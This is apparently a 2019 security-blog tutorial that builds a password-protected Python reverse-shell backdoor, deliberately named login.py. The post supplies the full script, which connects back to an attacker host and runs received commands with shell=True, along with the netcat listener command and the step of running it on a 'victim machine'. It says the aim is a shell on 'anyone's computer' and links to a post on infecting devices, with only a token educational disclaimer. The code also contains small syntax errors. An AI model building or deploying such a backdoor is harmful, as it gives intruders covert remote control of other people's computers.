So we’ve delved into Python before, but this post should be a bit more interesting. What we will do today is write a backdoor in Python and if you manage to install this backdoor on anyone’s computer, you will have a shell to that computer from your own.
As always, these posts are for educational purposes and you should not try this on anyone’s devices but your own.
Firstly you will need Python installed on your machine, happily this is already installed on most Linux distros, but for Windows you will need to download and install it from here.
Open a shell and use your favorite text editor to create a new file called login.py.
nano login.py
Cool, now let’s get coding shall we?
First it’s shebang and imports.
#! /usr/bin/python import subprocess import socket
So we are importing libraries here, the first one, subprocess is going to allow us to execute a process from within our Python script, and this is how we will be able to process commands.
Next we have the socket library, this helps us to work with and manipulate socket data. This is how devices communicate over the internet, through sockets.
Next we need to make some variables.
So we need a host, our attacking machine (this is the IP we want our reverse shell to go to), the port we want to listen on and a password that will be used to protect the backdoor. So only you will be able to use this program.
host = "127.0.0.1" port = 443 passwd = whateveryouwant
Keep that password, because that’s what will get you access in the future.
Next we need some methods, first of all the login method. This is going to check any user that connects to the backdoor and see if the password they use is valid or not. If they use a bad password it will give the user a redirect back to the login.
If the password is valid we get a command prompt and call a shell method, are you following along so far? 😉
def login():
global s
s.send("login: ")
pwd = s.recv(1024)
if pwd.strip() !=passwd:
Login()
else:
s.send("Connected #> ")
Shell()
Perfect. The (s) we used was a global variable and we will be using that later in the code so that we can access our sockets from anywhere in the application.
Also, we used if pwd.strip() which will strip any white spaces from what the user types.
So let’s code the shell method, this will tell the rest of the code what to do once the correct password is provided. What we want is to run the code for infinity so we can login at any time.
So we grab any data that’s typed and store into a variable called data and we will call this through the code.
We will also use a KILL option in case we want to stop the program at any time in the future.
We will then run a subprocess, a program within a program, yup, let’s do it. Our data variable is going to be the variable that connects us back to the socket we created earlier.
def Shell():
while True:
data = s.recv(1024)
if data.strip() == ' :kill':
break
proc = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin-subprocess.PIPE)
output = proc.stdout.read() + proc.stderr.read()
s.send(output)
s.send(" #> ")
Wonderful!! Isn’t coding magnificent? 😀
Now we need to code our connection back to our attacking machine. Here we will use the (s) variable again.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) Login()
Well done, you just coded a backdoor only you can connect to 😉 We hope you managed to get a connection from your different virtual machines with this backdoor.
So let’s test it, once you have the backdoor installed on your device, let’s connect to it via our Kali machine. We need a listening tool to listen for any incoming connections.
So we can use netcat that is pre-installed on Kali. Let’s listen on port 443 as our code has instructed.
nc -lvp 443
Next we just need to execute the Python script on the victim machine, so let’s do that.
./login.py
That will run the backdoor secretly in the background. So let’s see the results on our attack computer.
There we go, we have a connection, enter your super secret creds that you used earlier and you have full control of the server/machine/IOT device.
We have posted earlier how you might infect another device here.
Thanks for reading, please subscribe if you liked the content and be sure to come back for more tutorials in the future 👍👍👍👍
Also comment if you found this post useful.
QuBits 2019-09-28
Linux Security Blog 